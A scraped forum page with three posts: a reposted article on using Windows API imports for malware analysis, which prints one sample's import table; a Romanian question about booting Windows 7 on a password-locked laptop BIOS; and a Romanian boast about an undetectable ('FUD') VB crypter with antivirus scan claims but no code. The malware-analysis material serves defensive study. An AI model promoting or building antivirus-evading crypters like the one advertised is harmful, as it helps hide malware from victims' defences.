  21. The Windows API for Hackers and Reverse Engineers The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area than the more I use the APIs the more that I find myself looking up speific APIs and wishing that I would have known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well to put it shortly, they can make your life considerably easier. If you do incident response, are just getting starting writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis. One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing a considerable amount more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs, this is not common and would leave the malware sample significantly larger) There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports. kernel32.dll DeleteCriticalSection 0x4090dc kernel32.dll LeaveCriticalSection 0x4090e0 kernel32.dll EnterCriticalSection 0x4090e4 kernel32.dll VirtualFree 0x4090e8 kernel32.dll LocalFree 0x4090ec kernel32.dll GetCurrentThreadId 0x4090f0 kernel32.dll GetStartupInfoA 0x4090f4 kernel32.dll GetCommandLineA 0x4090f8 kernel32.dll FreeLibrary 0x4090fc kernel32.dll ExitProcess 0x409100 kernel32.dll WriteFile 0x409104 kernel32.dll UnhandledExceptionFilter 0x409108 kernel32.dll RtlUnwind 0x40910c kernel32.dll RaiseException 0x409110 kernel32.dll GetStdHandle 0x409114 user32.dll GetKeyboardType 0x40911c user32.dll MessageBoxA 0x409120 advapi32.dll RegQueryValueExA 0x409128 advapi32.dll RegOpenKeyExA 0x40912c advapi32.dll RegCloseKey 0x409130 kernel32.dll TlsSetValue 0x409138 kernel32.dll TlsGetValue 0x40913c kernel32.dll TlsFree 0x409140 kernel32.dll TlsAlloc 0x409144 kernel32.dll LocalFree 0x409148 kernel32.dll LocalAlloc 0x40914c wsock32.dll closesocket 0x409154 wsock32.dll WSACleanup 0x409158 wsock32.dll recv 0x40915c wsock32.dll send 0x409160 wsock32.dll connect 0x409164 wsock32.dll htons 0x409168 wsock32.dll socket 0x40916c wsock32.dll WSAStartup 0x409170 wsock32.dll gethostbyname 0x409174 advapi32.dll RegSetValueExA 0x40917c advapi32.dll RegCreateKeyA 0x409180 advapi32.dll RegCloseKey 0x409184 advapi32.dll AdjustTokenPrivileges 0x409188 advapi32.dll LookupPrivilegeValueA 0x40918c advapi32.dll OpenProcessToken 0x409190 user32.dll GetForegroundWindow 0x409198 user32.dll wvsprintfA 0x40919c kernel32.dll CloseHandle 0x4091a4 kernel32.dll RtlMoveMemory 0x4091a8 kernel32.dll RtlZeroMemory 0x4091ac kernel32.dll WriteProcessMemory 0x4091b0 kernel32.dll ReadProcessMemory 0x4091b4 kernel32.dll VirtualProtect 0x4091b8 kernel32.dll Sleep 0x4091bc kernel32.dll GetTickCount 0x4091c0 kernel32.dll MoveFileExA 0x4091c4 kernel32.dll ReadFile 0x4091c8 kernel32.dll WriteFile 0x4091cc kernel32.dll SetFilePointer 0x4091d0 kernel32.dll FindClose 0x4091d4 kernel32.dll FindFirstFileA 0x4091d8 kernel32.dll DeleteFileA 0x4091dc kernel32.dll CreateFileA 0x4091e0 kernel32.dll GetPrivateProfileIntA 0x4091e4 kernel32.dll GetPrivateProfileStringA 0x4091e8 kernel32.dll WritePrivateProfileStringA 0x4091ec kernel32.dll SetFileAttributesA 0x4091f0 kernel32.dll GetCurrentProcessId 0x4091f4 kernel32.dll GetCurrentProcess 0x4091f8 kernel32.dll Process32Next 0x4091fc kernel32.dll Process32First 0x409200 kernel32.dll Module32Next 0x409204 kernel32.dll Module32First 0x409208 kernel32.dll CreateToolhelp32Snapshot 0x40920c kernel32.dll WinExec 0x409210 kernel32.dll lstrcpyA 0x409214 kernel32.dll lstrcatA 0x409218 kernel32.dll lstrcmpiA 0x40921c kernel32.dll lstrcmpA 0x409220 kernel32.dll lstrlenA 0x409224 kernel32.dll lstrlenA 0x40922c kernel32.dll lstrcpyA 0x409230 kernel32.dll lstrcmpiA 0x409234 kernel32.dll lstrcmpA 0x409238 kernel32.dll lstrcatA 0x40923c kernel32.dll WriteProcessMemory 0x409240 kernel32.dll VirtualProtect 0x409244 kernel32.dll TerminateThread 0x409248 kernel32.dll TerminateProcess 0x40924c kernel32.dll Sleep 0x409250 kernel32.dll OpenProcess 0x409254 kernel32.dll GetWindowsDirectoryA 0x409258 kernel32.dll GetTickCount 0x40925c kernel32.dll GetSystemDirectoryA 0x409260 kernel32.dll GetModuleHandleA 0x409264 kernel32.dll GetCurrentProcessId 0x409268 kernel32.dll GetCurrentProcess 0x40926c kernel32.dll GetComputerNameA 0x409270 kernel32.dll ExitProcess 0x409274 kernel32.dll CreateThread 0x409278 user32.dll wvsprintfA 0x409280 user32.dll UnhookWindowsHookEx 0x409284 user32.dll SetWindowsHookExA 0x409288 user32.dll GetWindowThreadProcessId 0x40928c user32.dll GetWindowTextA 0x409290 user32.dll GetForegroundWindow 0x409294 user32.dll GetClassNameA 0x409298 user32.dll CallNextHookEx 0x40929c Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for you can begin to make assumptions about the function of this malware. For example GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypothesis about the capabilities of this specific sample. I’ve noticed that analysts who don’t totally understand these API function will typically ignore them. For that fact I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious). Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind this list is not final and if you have any feedback, comments, questions, or recommendations please make them! In the course of developing the current list I used multiple resources, I’d just like to highlight a few. These are also great resources if you’re looking to learn more. Resources: Practical Malware Analysis – great book on reverse engineering malware MSDN – where to go if you’re curious about a specific Windows API Windows PE File Details – Great article that describes the fundamentals of the PE file and more details surrounding PE file imports Cheat Sheet Version .5 : Download Source : https://www.bnxnet.com/windows-api-for-hackers/
  22. Salut,un prieten si-a achizitionat un notebook pentru facultate de la un magazin Carrefour,toate bune si frumoase a ajuns cu el acasa si m-a chemat sa-i pun windows 7 pe el (mentionez ca pe notebook avea un soft de prezentare ceva in care arata capacitatile lui etc ). Am bootat pe un stick usb windows 7 am ajuns la el am dat F2 cand sa intru in bios imi cere parola,a sunat omul la magazin si aia i-au dat parola,intru in bios selectez sa se booteze de pe stick windowsul dau F10 salvez,isi da restart dar pur si simplu nu a incercat sa ia windowsul. Am vazut prin bios ca e limitat,are parole peste tot si nustiu ce sa-i fac, oare nu accepta windows 7 si ii trebuie neaparat windows 8 sau ? O sa va las mai jos doua imagini una in care se vede bios-ul si una cu modelul exact al notebook-ului . View image: DSC 0041 View image: DSC 0040 Astept ceva recomandari,multumesc frumos,o zi buna!
  23. Crypter?RST by dang3r1988[100% FUD - 0/35 AVS] Create Vb CRYPTER FUNCTIONAL S.O XP sp1 OK XP sp2 OK XP sp3 OK Vista x86 OK Vista x64 OK Windows 7 X86 OK Windows 7 x64 OK Windows 8 X86 OK Windows 8 x64 OK Windows 10 X86 OK Windows 10 x64 OK Scan:::... Am zis ca nu va mai prezint nimic din ceea ce stiu eu!! dar avand in vedere comentarile voastre si o sa va mai arat ca ,eu am cunostinte in IT si nu vorbesc baliverne ca voi, care inca va mai uitati la desene animate si stiti doar sa stati pe facebook si sa comentati inutil in nestinta de cauza ,,UNI,,Si nu o sa va dau link de download sa va bateti voi joc de nunca mea si nici nu cred ca va trebuie crypter meu??? ca voi stiti sa va faceti singuri dupa cum comentati:))1+1=5:))
×
×
  • Create New...